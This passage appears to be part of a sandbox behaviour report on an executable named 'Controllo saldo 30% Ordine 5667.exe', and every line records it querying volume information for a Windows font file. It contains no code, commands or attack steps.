Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
